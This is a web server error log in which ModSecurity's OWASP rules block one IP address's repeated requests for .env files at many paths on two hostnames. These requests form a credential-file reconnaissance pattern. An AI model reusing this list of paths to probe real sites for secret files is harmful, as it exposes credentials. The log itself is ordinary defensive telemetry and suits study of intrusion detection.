[Thu Mar 06 21:16:04.917529 2025] [:error] [pid 1596876] [client 193.41.206.50:50672] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z8oChAtea6oevJ_vrnxS0gAAAAo"]
[Thu Mar 06 21:16:04.918090 2025] [:error] [pid 1596876] [client 193.41.206.50:50672] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z8oChAtea6oevJ_vrnxS0gAAAAo"]
[Thu Mar 06 21:16:05.145850 2025] [:error] [pid 1596492] [client 193.41.206.50:50684] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z8oCheM5BYheaS8kb_9joAAAAAU"]
[Thu Mar 06 21:16:05.146495 2025] [:error] [pid 1596492] [client 193.41.206.50:50684] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z8oCheM5BYheaS8kb_9joAAAAAU"]
[Thu Mar 06 21:16:05.147059 2025] [:error] [pid 1596492] [client 193.41.206.50:50684] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z8oCheM5BYheaS8kb_9joAAAAAU"]
[Thu Mar 06 21:16:06.040374 2025] [:error] [pid 1596476] [client 193.41.206.50:50710] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z8oChuXrc9iXbNFmgRc3kQAAAAE"]
[Thu Mar 06 21:16:06.041005 2025] [:error] [pid 1596476] [client 193.41.206.50:50710] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z8oChuXrc9iXbNFmgRc3kQAAAAE"]
[Thu Mar 06 21:16:06.041444 2025] [:error] [pid 1596476] [client 193.41.206.50:50710] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z8oChuXrc9iXbNFmgRc3kQAAAAE"]
[Thu Mar 06 21:16:06.261669 2025] [:error] [pid 1596879] [client 193.41.206.50:50716] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z8oChu745ymAxtZtUa4tIQAAAA0"]
[Thu Mar 06 21:16:06.262332 2025] [:error] [pid 1596879] [client 193.41.206.50:50716] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z8oChu745ymAxtZtUa4tIQAAAA0"]
[Thu Mar 06 21:16:06.262804 2025] [:error] [pid 1596879] [client 193.41.206.50:50716] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z8oChu745ymAxtZtUa4tIQAAAA0"]
[Thu Mar 06 21:16:06.399148 2025] [:error] [pid 1598036] [client 193.41.206.50:50732] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z8oChmkJO-EGMu6NudxX4QAAAAQ"]
[Thu Mar 06 21:16:06.399737 2025] [:error] [pid 1598036] [client 193.41.206.50:50732] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z8oChmkJO-EGMu6NudxX4QAAAAQ"]
[Thu Mar 06 21:16:06.400232 2025] [:error] [pid 1598036] [client 193.41.206.50:50732] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z8oChmkJO-EGMu6NudxX4QAAAAQ"]
[Thu Mar 06 21:16:06.532035 2025] [:error] [pid 1596877] [client 193.41.206.50:50742] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z8oChnWVQL6AB-xyLYI7QAAAAAs"]
[Thu Mar 06 21:16:06.532810 2025] [:error] [pid 1596877] [client 193.41.206.50:50742] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z8oChnWVQL6AB-xyLYI7QAAAAAs"]
[Thu Mar 06 21:16:06.533262 2025] [:error] [pid 1596877] [client 193.41.206.50:50742] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z8oChnWVQL6AB-xyLYI7QAAAAAs"]
[Thu Mar 06 21:16:06.816752 2025] [:error] [pid 1596922] [client 193.41.206.50:50758] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z8oChgYmsTfmJwpZ5aP1swAAAAM"]
[Thu Mar 06 21:16:06.817365 2025] [:error] [pid 1596922] [client 193.41.206.50:50758] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z8oChgYmsTfmJwpZ5aP1swAAAAM"]
[Thu Mar 06 21:16:06.817834 2025] [:error] [pid 1596922] [client 193.41.206.50:50758] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z8oChgYmsTfmJwpZ5aP1swAAAAM"]
[Thu Mar 06 21:16:07.044496 2025] [authz_core:error] [pid 1596878] [client 193.41.206.50:50768] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Thu Mar 06 21:16:07.278768 2025] [:error] [pid 1596876] [client 193.41.206.50:50780] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z8oChwtea6oevJ_vrnxS0wAAAAo"]
[Thu Mar 06 21:16:07.279277 2025] [:error] [pid 1596876] [client 193.41.206.50:50780] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z8oChwtea6oevJ_vrnxS0wAAAAo"]
[Thu Mar 06 21:16:07.279651 2025] [:error] [pid 1596876] [client 193.41.206.50:50780] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z8oChwtea6oevJ_vrnxS0wAAAAo"]
[Fri Mar 07 22:41:29.971496 2025] [:error] [pid 1623580] [client 193.41.206.50:35054] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z8toCXQCI01QGzZ9cC-9JgAAAAk"]
[Fri Mar 07 22:41:29.973055 2025] [:error] [pid 1623580] [client 193.41.206.50:35054] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z8toCXQCI01QGzZ9cC-9JgAAAAk"]
[Fri Mar 07 22:41:29.973590 2025] [:error] [pid 1623580] [client 193.41.206.50:35054] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z8toCXQCI01QGzZ9cC-9JgAAAAk"]
[Fri Mar 07 22:41:30.212276 2025] [:error] [pid 1617779] [client 193.41.206.50:35062] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z8toCtpB29KNnzpwi-ekjQAAAAU"]
[Fri Mar 07 22:41:30.212870 2025] [:error] [pid 1617779] [client 193.41.206.50:35062] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z8toCtpB29KNnzpwi-ekjQAAAAU"]
[Fri Mar 07 22:41:30.213354 2025] [:error] [pid 1617779] [client 193.41.206.50:35062] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z8toCtpB29KNnzpwi-ekjQAAAAU"]
[Fri Mar 07 22:41:31.346138 2025] [:error] [pid 1631035] [client 193.41.206.50:35088] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z8toC1vDpYdixkYQztvu6wAAAAo"]
[Fri Mar 07 22:41:31.346782 2025] [:error] [pid 1631035] [client 193.41.206.50:35088] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z8toC1vDpYdixkYQztvu6wAAAAo"]
[Fri Mar 07 22:41:31.347271 2025] [:error] [pid 1631035] [client 193.41.206.50:35088] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z8toC1vDpYdixkYQztvu6wAAAAo"]
[Fri Mar 07 22:41:31.700439 2025] [:error] [pid 1617763] [client 193.41.206.50:35104] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z8toC7flplU8QVEnyy4dRwAAAAI"]
[Fri Mar 07 22:41:31.701022 2025] [:error] [pid 1617763] [client 193.41.206.50:35104] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z8toC7flplU8QVEnyy4dRwAAAAI"]
[Fri Mar 07 22:41:31.701479 2025] [:error] [pid 1617763] [client 193.41.206.50:35104] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z8toC7flplU8QVEnyy4dRwAAAAI"]
[Fri Mar 07 22:41:31.961767 2025] [:error] [pid 1623578] [client 193.41.206.50:35118] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z8toC0iERItPrH-RnZWc2AAAAAc"]
[Fri Mar 07 22:41:31.964053 2025] [:error] [pid 1623578] [client 193.41.206.50:35118] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z8toC0iERItPrH-RnZWc2AAAAAc"]
[Fri Mar 07 22:41:31.964691 2025] [:error] [pid 1623578] [client 193.41.206.50:35118] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z8toC0iERItPrH-RnZWc2AAAAAc"]
[Fri Mar 07 22:41:32.401326 2025] [:error] [pid 1617764] [client 193.41.206.50:35130] [client 193.41.206.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z8toDC8ZSYlbKxavz702_wAAAAM"]
[Fri Mar 07 22:41:32.401944 2025] [:error] [pid 1617764] [client 193.41.206.50:35130] [client 193.41.206.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z8toDC8ZSYlbKxavz702_wAAAAM"]
[Fri Mar 07 22:41:32.402481 2025] [:error] [pid 1617764] [client 193.41.206.50:35130] [client 193.41.206.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z8toDC8ZSYlbKxavz702_wAAAAM"]
